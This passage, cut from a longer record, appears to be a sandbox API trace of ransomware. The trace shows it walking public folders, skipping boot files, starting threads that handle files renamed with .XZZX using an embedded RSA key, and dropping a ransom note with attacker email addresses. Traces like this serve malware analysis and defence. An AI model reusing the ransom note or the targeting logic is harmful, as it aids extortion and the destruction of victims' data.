MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.323] lstrcpyW (in: lpString1=0x17be7c, lpString2="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX" | out: lpString1="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX") returned="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX" [0211.323] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0211.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfa8 [0211.324] WaitForSingleObject (hHandle=0xfa8, dwMilliseconds=0xffffffff) returned 0x0 [0211.324] Sleep (dwMilliseconds=0x96) [0211.479] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0211.479] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0211.479] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0211.479] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0211.479] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0211.479] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0211.479] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0211.479] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0211.479] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*" [0211.479] SetErrorMode (uMode=0x1) returned 0x1 [0211.479] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\_HELP_INSTRUCTION.TXT") returned 62 [0211.479] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0211.479] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0211.480] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xfac) returned 0x0 [0211.480] RegQueryValueExW (in: hKey=0xfac, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4369010, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x4369010*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0211.480] RegCloseKey (hKey=0xfac) returned 0x0 [0211.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0211.480] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0211.480] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\pictures\\sample pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfac [0211.480] CloseHandle (hObject=0xfac) returned 1 [0211.480] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0211.480] PathFindFileNameW (pszPath="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="Sample Pictures" [0211.480] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0211.480] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0211.480] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0211.480] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0211.480] SetErrorMode (uMode=0x1) returned 0x1 [0211.480] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0211.480] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\") returned="C:\\Users\\Public\\Recorded TV\\" [0211.480] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Recorded TV\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\") returned="C:\\Users\\Public\\Recorded TV\\" [0211.480] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\*.*") returned="C:\\Users\\Public\\Recorded TV\\*.*" [0211.480] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0211.480] PathFindFileNameW (pszPath="C:\\Users\\Public\\Recorded TV") returned="Recorded TV" [0211.480] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Recorded TV" | out: lpString1="Recorded TV") returned="Recorded TV" [0211.480] StrStrW (lpFirst="1EDF30F91E98B984E23EDAF123369DCC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0211.480] StrStrW (lpFirst="1EDF30F91E98B984E23EDAF123369DCC.XZZX", lpSrch="ntldr") returned 0x0 [0211.480] StrStrW (lpFirst="1EDF30F91E98B984E23EDAF123369DCC.XZZX", lpSrch="NTLDR") returned 0x0 [0211.480] StrStrW (lpFirst="1EDF30F91E98B984E23EDAF123369DCC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0211.481] StrStrW (lpFirst="1EDF30F91E98B984E23EDAF123369DCC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0211.481] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\") returned 32 [0211.481] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Recorded TV\\") [0211.481] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.481] lstrcpyW (in: lpString1=0x17cf1c, lpString2="1EDF30F91E98B984E23EDAF123369DCC.XZZX" | out: lpString1="1EDF30F91E98B984E23EDAF123369DCC.XZZX") returned="1EDF30F91E98B984E23EDAF123369DCC.XZZX" [0211.481] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\" [0211.481] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfb4 [0211.481] Sleep (dwMilliseconds=0x96) [0211.635] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0211.635] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0211.635] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0211.635] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0211.635] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0211.635] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0211.635] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0211.635] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0211.635] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0211.635] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\*.*") returned="C:\\Users\\Public\\Recorded TV\\*.*" [0211.635] SetErrorMode (uMode=0x1) returned 0x1 [0211.636] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Recorded TV\\_HELP_INSTRUCTION.TXT") returned 49 [0211.636] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0211.636] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0211.636] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xfb8) returned 0x0 [0211.636] RegQueryValueExW (in: hKey=0xfb8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4369240, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4369240*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0211.636] RegCloseKey (hKey=0xfb8) returned 0x0 [0211.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0211.636] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0211.636] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\recorded tv\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfb8 [0211.636] CloseHandle (hObject=0xfb8) returned 1 [0211.636] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0211.637] PathFindFileNameW (pszPath="C:\\Users\\Public\\Recorded TV") returned="Recorded TV" [0211.637] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Recorded TV" | out: lpString1="Recorded TV") returned="Recorded TV" [0211.637] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0211.637] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\") returned="C:\\Users\\Public\\Recorded TV\\" [0211.637] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\", lpString2="Sample Media" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0211.637] SetErrorMode (uMode=0x1) returned 0x1 [0211.637] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0211.637] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0211.637] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0211.637] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*" [0211.637] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0211.637] PathFindFileNameW (pszPath="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="Sample Media" [0211.637] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Media" | out: lpString1="Sample Media") returned="Sample Media" [0211.637] StrStrW (lpFirst="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0211.637] StrStrW (lpFirst="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX", lpSrch="ntldr") returned 0x0 [0211.637] StrStrW (lpFirst="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX", lpSrch="NTLDR") returned 0x0 [0211.637] StrStrW (lpFirst="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0211.637] StrStrW (lpFirst="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0211.637] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 45 [0211.637] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") [0211.637] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.637] lstrcpyW (in: lpString1=0x17be7c, lpString2="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX" | out: lpString1="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX") returned="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX" [0211.637] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0211.638] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc0 [0211.638] Sleep (dwMilliseconds=0x96) [0211.791] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0211.791] lstrcmpW (lpString1="39D4778C1CA7A7942937668620DB8BDC.XZZX", lpString2="..") returned 1 [0211.791] lstrcmpW (lpString1="39D4778C1CA7A7942937668620DB8BDC.XZZX", lpString2=".") returned 1 [0211.791] StrStrW (lpFirst="39D4778C1CA7A7942937668620DB8BDC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0211.791] StrStrW (lpFirst="39D4778C1CA7A7942937668620DB8BDC.XZZX", lpSrch="ntldr") returned 0x0 [0211.791] StrStrW (lpFirst="39D4778C1CA7A7942937668620DB8BDC.XZZX", lpSrch="NTLDR") returned 0x0 [0211.791] StrStrW (lpFirst="39D4778C1CA7A7942937668620DB8BDC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0211.791] StrStrW (lpFirst="39D4778C1CA7A7942937668620DB8BDC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0211.791] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 45 [0211.791] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") [0211.791] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.791] lstrcpyW (in: lpString1=0x17be7c, lpString2="39D4778C1CA7A7942937668620DB8BDC.XZZX" | out: lpString1="39D4778C1CA7A7942937668620DB8BDC.XZZX") returned="39D4778C1CA7A7942937668620DB8BDC.XZZX" [0211.791] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0211.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc4 [0211.792] Sleep (dwMilliseconds=0x96) [0211.947] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0211.947] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0211.947] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0211.947] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0211.947] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0211.947] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0211.947] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0211.947] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0211.947] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*" [0211.947] SetErrorMode (uMode=0x1) returned 0x1 [0211.947] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\_HELP_INSTRUCTION.TXT") returned 62 [0211.948] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0211.948] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0211.948] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xfc8) returned 0x0 [0211.948] RegQueryValueExW (in: hKey=0xfc8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4369470, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x4369470*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0211.948] RegCloseKey (hKey=0xfc8) returned 0x0 [0211.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0211.948] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0211.948] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\recorded tv\\sample media\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc8 [0211.948] CloseHandle (hObject=0xfc8) returned 1 [0211.949] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0211.949] PathFindFileNameW (pszPath="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="Sample Media" [0211.949] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Media" | out: 